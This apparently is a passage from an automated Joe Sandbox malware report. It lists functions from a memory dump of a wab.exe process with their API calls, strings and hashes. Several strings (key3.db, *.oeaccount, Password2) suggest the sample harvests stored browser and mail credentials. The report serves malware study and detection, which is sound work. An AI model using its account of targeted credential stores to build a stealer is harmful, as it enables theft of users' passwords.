                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040717E Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _mbscat$memsetsprintf
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 125969286-0
                                                                                                                                                                                          • Opcode ID: cfc2cdd9402285d373237ff41ddaadf9cb54e449d46b0907ea735e806236394e
                                                                                                                                                                                          • Instruction ID: 1eb43bd5b8120d09ab0b11fdee56c07fa856cfecb869048c22175c4298d2535e
                                                                                                                                                                                          • Opcode Fuzzy Hash: cfc2cdd9402285d373237ff41ddaadf9cb54e449d46b0907ea735e806236394e
                                                                                                                                                                                          • Instruction Fuzzy Hash: EF014C32D0826436F72156159C03BBB77A89B85704F10407FFD44A92C1EEBCE984479A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00408E21 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetParent.USER32(?), ref: 00408E33
                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00408E40
                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 00408E4B
                                                                                                                                                                                          • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 00408E5B
                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00408E77
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4247780290-0
                                                                                                                                                                                          • Opcode ID: 06bcd35f29f4ad8b1f8be6fafa23155ea8198cc34ea2cee51d518efb77a86cea
                                                                                                                                                                                          • Instruction ID: d5d25afb3259b03ed1d628add5c616d0d22dc24c96253af88726d5856d44a725
                                                                                                                                                                                          • Opcode Fuzzy Hash: 06bcd35f29f4ad8b1f8be6fafa23155ea8198cc34ea2cee51d518efb77a86cea
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E01653680052ABBDB11ABA59C49EFFBFBCFF06750F04402AFD05A2181D77895018BA5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040B6EF Relevance: 7.5, APIs: 5, Instructions: 44windowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0040B70C
                                                                                                                                                                                            • Part of subcall function 00406A00: LoadCursorA.USER32(00000000,00007F02), ref: 00406A07
                                                                                                                                                                                            • Part of subcall function 00406A00: SetCursor.USER32(00000000), ref: 00406A0E
                                                                                                                                                                                          • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 0040B72F
                                                                                                                                                                                            • Part of subcall function 0040B65E: sprintf.MSVCRT ref: 0040B684
                                                                                                                                                                                            • Part of subcall function 0040B65E: sprintf.MSVCRT ref: 0040B6AE
                                                                                                                                                                                            • Part of subcall function 0040B65E: _mbscat.MSVCRT ref: 0040B6C1
                                                                                                                                                                                            • Part of subcall function 0040B65E: SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B6E7
                                                                                                                                                                                          • SetCursor.USER32(?,?,0040C8F2), ref: 0040B754
                                                                                                                                                                                          • SetFocus.USER32(?,?,?,0040C8F2), ref: 0040B766
                                                                                                                                                                                          • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 0040B77D
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend$Cursor$sprintf$FocusLoad_mbscat
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2374668499-0
                                                                                                                                                                                          • Opcode ID: 53ade561a914af880d1e6a05375d4a59a2fac5c4dfd76dfdfba0808ab67976fb
                                                                                                                                                                                          • Instruction ID: 612281c0e7bcc4a6d3b4da52a7b96f70e992a4283d6ab6b50bd9db3d0aad170a
                                                                                                                                                                                          • Opcode Fuzzy Hash: 53ade561a914af880d1e6a05375d4a59a2fac5c4dfd76dfdfba0808ab67976fb
                                                                                                                                                                                          • Instruction Fuzzy Hash: 120129B5200A00EFD726AB75CC85FA6B7E9FF48315F0604B9F1199B272CA726D018F14
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040AA94 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 44COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 0040AAB7
                                                                                                                                                                                          • memset.MSVCRT ref: 0040AACD
                                                                                                                                                                                            • Part of subcall function 00406AD1: strlen.MSVCRT ref: 00406ADE
                                                                                                                                                                                            • Part of subcall function 00406AD1: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A8D9,?,<item>), ref: 00406AEB
                                                                                                                                                                                            • Part of subcall function 0040A245: _mbscpy.MSVCRT ref: 0040A24A
                                                                                                                                                                                            • Part of subcall function 0040A245: _strlwr.MSVCRT ref: 0040A28D
                                                                                                                                                                                          • sprintf.MSVCRT ref: 0040AB04
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 0040AAD2
                                                                                                                                                                                          • <%s>, xrefs: 0040AAFE
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
                                                                                                                                                                                          • String ID: <%s>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                                                                                          • API String ID: 3699762281-1998499579
                                                                                                                                                                                          • Opcode ID: d5ee42966936a1138623645e18684dfcccb61381e14bbb228212885f4d89bd19
                                                                                                                                                                                          • Instruction ID: a3dff73391336119dc4caae329f843e57b3ce466119e41e431a2bb454e721b3a
                                                                                                                                                                                          • Opcode Fuzzy Hash: d5ee42966936a1138623645e18684dfcccb61381e14bbb228212885f4d89bd19
                                                                                                                                                                                          • Instruction Fuzzy Hash: ED01F7729401296AEB20B655CC45FDA7A6CAF45305F0400BAB509B2182DBB49E548BA5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040979F Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??3@
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 613200358-0
                                                                                                                                                                                          • Opcode ID: 7a9d4f54567c0a48d1859bf8158ae1996b1b95a3d5575a953b4da3af230d69c1
                                                                                                                                                                                          • Instruction ID: ea629a9aafeff6281071dae141f51b3a8c797cef86d835f03ce988520f4efe7f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7a9d4f54567c0a48d1859bf8158ae1996b1b95a3d5575a953b4da3af230d69c1
                                                                                                                                                                                          • Instruction Fuzzy Hash: 94F0FF73609B01DBD7209FA99AC065BF7E9AB48724BA4093FF149D3642C738BC54C618
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00409805 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097AB
                                                                                                                                                                                            • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097B9
                                                                                                                                                                                            • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097CA
                                                                                                                                                                                            • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097E1
                                                                                                                                                                                            • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097EA
                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00409820
                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00409833
                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00409846
                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00409859
                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040986D
                                                                                                                                                                                            • Part of subcall function 004077E4: ??3@YAXPAX@Z.MSVCRT ref: 004077EB
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??3@
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 613200358-0
                                                                                                                                                                                          • Opcode ID: d9c01388865c204718a59a81bbac89ec1da5725ce67048d786a5844de5934490
                                                                                                                                                                                          • Instruction ID: 7a7d368fa20b86f0ae4ccc19201ff918d3b0396c1b4e5cf9e7c68f971a3fafa8
                                                                                                                                                                                          • Opcode Fuzzy Hash: d9c01388865c204718a59a81bbac89ec1da5725ce67048d786a5844de5934490
                                                                                                                                                                                          • Instruction Fuzzy Hash: 29F03633D1A930D7C6257B66500164EE3686E86B3931942AFF9047B7D28F3C7C5485DE
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004100EC Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00406EA5: memset.MSVCRT ref: 00406EC5
                                                                                                                                                                                            • Part of subcall function 00406EA5: GetClassNameA.USER32(?,00000000,000000FF), ref: 00406ED8
                                                                                                                                                                                            • Part of subcall function 00406EA5: _strcmpi.MSVCRT ref: 00406EEA
                                                                                                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 00410113
                                                                                                                                                                                          • GetSysColor.USER32(00000005), ref: 0041011B
                                                                                                                                                                                          • SetBkColor.GDI32(?,00000000), ref: 00410125
                                                                                                                                                                                          • SetTextColor.GDI32(?,00C00000), ref: 00410133
                                                                                                                                                                                          • GetSysColorBrush.USER32(00000005), ref: 0041013B
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Color$BrushClassModeNameText_strcmpimemset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2775283111-0
                                                                                                                                                                                          • Opcode ID: 627087e029a1abcb04561e415bb5884c82ccbbb1204662b743e4c0e852913d63
                                                                                                                                                                                          • Instruction ID: 15b5804eddbfc7b45e8a586a0394ac07707e7803bdc14c23b44bbc646b24dc1f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 627087e029a1abcb04561e415bb5884c82ccbbb1204662b743e4c0e852913d63
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7DF0F935100508BBDF116FA5DC09EDE3B25FF05711F10813AFA15585B1CBFAD9A09B58
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00405F2B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • BeginDeferWindowPos.USER32(0000000A), ref: 00405F44
                                                                                                                                                                                            • Part of subcall function 004015F3: GetDlgItem.USER32(?,?), ref: 00401603
                                                                                                                                                                                            • Part of subcall function 004015F3: GetClientRect.USER32(?,?), ref: 00401615
                                                                                                                                                                                            • Part of subcall function 004015F3: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 0040167F
                                                                                                                                                                                          • EndDeferWindowPos.USER32(?), ref: 00406003
                                                                                                                                                                                          • InvalidateRect.USER32(?,?,00000001), ref: 0040600E
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DeferWindow$Rect$BeginClientInvalidateItem
                                                                                                                                                                                          • String ID: $
                                                                                                                                                                                          • API String ID: 2498372239-3993045852
                                                                                                                                                                                          • Opcode ID: 4f29eeeafaf0275d54e1a8ac864168a2c968bf72d4383311267dcf3585429308
                                                                                                                                                                                          • Instruction ID: 00843a31076853278f863d8e49a3b1dedc6e53575b175ed212c8a3462f8966d2
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4f29eeeafaf0275d54e1a8ac864168a2c968bf72d4383311267dcf3585429308
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4D318F70640259BFEF229B52DC89D6F3A7CFBC5B88F10006DF401792A1CA794F51EA69
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00406868 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 63COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00406A9F: CreateFileA.KERNEL32(R7D,80000000,00000001,00000000,00000003,00000000,00000000,0044368E,?,.8D,00443752,?,?,*.oeaccount,.8D,?), ref: 00406AB1
                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,key3.db,00000143,00000000,C@,004069F3,00000000,?,?,00000000), ref: 0040688C
                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 004068B2
                                                                                                                                                                                            • Part of subcall function 00407691: ??3@YAXPAX@Z.MSVCRT ref: 00407698
                                                                                                                                                                                            • Part of subcall function 00407691: ??2@YAPAXI@Z.MSVCRT ref: 004076A6
                                                                                                                                                                                            • Part of subcall function 004072EF: ReadFile.KERNEL32(00000000,?,004436D1,00000000,00000000,?,?,004436D1,?,00000000), ref: 00407306
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                                                          • String ID: C@$key3.db
                                                                                                                                                                                          • API String ID: 1968906679-1993167907
                                                                                                                                                                                          • Opcode ID: 8070846350ac793f35cf726ef4b9da8142e130784681131c85812774ce581970
                                                                                                                                                                                          • Instruction ID: 0ede60c3f523747ec885d841e26685764e9001b1461c3323211a21065397dc39
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8070846350ac793f35cf726ef4b9da8142e130784681131c85812774ce581970
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9811D3B2D00514AFDB10AF19CC4588E7BA5EF46360B12807BF80AAB291DB34DD60CB98
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040BFC7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43windowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 0040BFE7
                                                                                                                                                                                          • SetFocus.USER32(?,?), ref: 0040C06F
                                                                                                                                                                                            • Part of subcall function 0040BFB1: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040BFC0
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FocusMessagePostmemset
                                                                                                                                                                                          • String ID: +_@$l
                                                                                                                                                                                          • API String ID: 3436799508-640399337
                                                                                                                                                                                          • Opcode ID: 5d19dabe06c04104d03c805a20db61bb7ad0843c3c7d2444441ab514d0ecd962
                                                                                                                                                                                          • Instruction ID: dfa99e5f235914639cafa3f1faff2c73f9381d0964b1719e4b49f1177e3774cc
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5d19dabe06c04104d03c805a20db61bb7ad0843c3c7d2444441ab514d0ecd962
                                                                                                                                                                                          • Instruction Fuzzy Hash: B411A172904198CBDF209B24CC44BCA7BB9AF90304F0900F5A94C7B2D2C7B55E89CFA9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00401000 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00406D65: memset.MSVCRT ref: 00406D6F
                                                                                                                                                                                            • Part of subcall function 00406D65: _mbscpy.MSVCRT ref: 00406DAF
                                                                                                                                                                                          • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                                                                                                                                                                          • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                                                                                                                                                                          • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                                                                                                                                                                          • String ID: MS Sans Serif
                                                                                                                                                                                          • API String ID: 3492281209-168460110
                                                                                                                                                                                          • Opcode ID: 2b978f582ba89fecee05bf5e4b747a5653f5ca03fd4d42c103354d0125bbd5b3
                                                                                                                                                                                          • Instruction ID: 91d7546927304a6081eb6d9f577e17eac68e9825403057b28fc40c6b5cfff950
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b978f582ba89fecee05bf5e4b747a5653f5ca03fd4d42c103354d0125bbd5b3
                                                                                                                                                                                          • Instruction Fuzzy Hash: 54F0A775A407047BEB3267A0EC47F4A7BACAB41B41F104535F651B51F2D6F4B544CB48
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00406EA5 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ClassName_strcmpimemset
                                                                                                                                                                                          • String ID: edit
                                                                                                                                                                                          • API String ID: 275601554-2167791130
                                                                                                                                                                                          • Opcode ID: ed2b804169d995c812202dfe57b894f8811318f38427dff4b8ba9102b7fae148
                                                                                                                                                                                          • Instruction ID: 847e1e856ca93c5331a43762777f09d1dcd0b535ae5450603ebfd434222f9f24
                                                                                                                                                                                          • Opcode Fuzzy Hash: ed2b804169d995c812202dfe57b894f8811318f38427dff4b8ba9102b7fae148
                                                                                                                                                                                          • Instruction Fuzzy Hash: A3E09B73C5412E7AEB21B6A4DC01FE6776CEF55705F0000F7B945E10C1E5B45A888B95
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040732D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: strlen$_mbscat
                                                                                                                                                                                          • String ID: 8D
                                                                                                                                                                                          • API String ID: 3951308622-2703402624
                                                                                                                                                                                          • Opcode ID: 0ec1879d80d4c340dda7a3243aeb4a8038102bdf29c15a79d9befc878d316230
                                                                                                                                                                                          • Instruction ID: fdb3abcae466a204d6f595596d606a7769775cd3d87c53e6d0f7ff6b17e0c5bf
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0ec1879d80d4c340dda7a3243aeb4a8038102bdf29c15a79d9befc878d316230
                                                                                                                                                                                          • Instruction Fuzzy Hash: F7D0A73390D62027F6153617BC07D8E5BD1CFD0779B18041FF908D2181DD3E8495909D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00443131 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 15COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _mbscat$_mbscpy
                                                                                                                                                                                          • String ID: Password2
                                                                                                                                                                                          • API String ID: 2600922555-1856559283
                                                                                                                                                                                          • Opcode ID: dd6d1596d5adc5cb59be199e9a5e42366e44826479dad9da6a8aaa41d84d8c14
                                                                                                                                                                                          • Instruction ID: 284e3ed20e01ed0f985c27cc48ee8d5f57cf04e2e68a318951e5723102309710
                                                                                                                                                                                          • Opcode Fuzzy Hash: dd6d1596d5adc5cb59be199e9a5e42366e44826479dad9da6a8aaa41d84d8c14
                                                                                                                                                                                          • Instruction Fuzzy Hash: DFC0126164253032351132152C02ECE5D444D927A9744405BF64871152DE4C092141EE
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0041067E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(shell32.dll,0041073A,00000104), ref: 0041068C
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 004106A1
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                                                                                                          • String ID: SHGetSpecialFolderPathA$shell32.dll
                                                                                                                                                                                          • API String ID: 2574300362-543337301
                                                                                                                                                                                          • Opcode ID: 2e6b26bb17626f4397607e962d7e33e0088331342153929cca1aec3e07a9d3dc
                                                                                                                                                                                          • Instruction ID: 89c53fa068d5e839e9f7b52beb2d5746c1b59f0700db89f23453b1bd6c0da6b7
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2e6b26bb17626f4397607e962d7e33e0088331342153929cca1aec3e07a9d3dc
                                                                                                                                                                                          • Instruction Fuzzy Hash: 31D09EB8A00349EFDB00AF21EC0874639946785756B104436A04591267E6B88091CE5D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00431CB5 Relevance: 6.5, APIs: 3, Strings: 1, Instructions: 469COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset
                                                                                                                                                                                          • String ID: rows deleted
                                                                                                                                                                                          • API String ID: 2221118986-571615504
                                                                                                                                                                                          • Opcode ID: 4c9dbc2b612ed9edf76401e4d6c70ac1deb0b9b48bbb52d81c4a8b84a7a8b6c2
                                                                                                                                                                                          • Instruction ID: 2c87624536f7d1d2c67b3f30ed48d8bcf82a012ac595ca9270874480dc5e5985
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4c9dbc2b612ed9edf76401e4d6c70ac1deb0b9b48bbb52d81c4a8b84a7a8b6c2
                                                                                                                                                                                          • Instruction Fuzzy Hash: 47028F71E00218AFDF14DF99DD81AAEBBB5EF08314F14005AFA04A7352E775AD41CB99
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0041B58C Relevance: 6.3, APIs: 5, Instructions: 82COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpy$memcmp
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3384217055-0
                                                                                                                                                                                          • Opcode ID: e3acc2376955a3743a68dcdfb4fb7f0e30d5fba998ed12fb16b657197a27482f
                                                                                                                                                                                          • Instruction ID: 3ed27bb9f02c74045d0acb38b61796dbe98832ce2e8f1163f6a46f85a071a1b4
                                                                                                                                                                                          • Opcode Fuzzy Hash: e3acc2376955a3743a68dcdfb4fb7f0e30d5fba998ed12fb16b657197a27482f
                                                                                                                                                                                          • Instruction Fuzzy Hash: C62181B2E106486BDB14DBA5D846EDF73ECEB94704F04082AB511D7241EB38E644C765
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00442878 Relevance: 6.3, APIs: 5, Instructions: 81COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
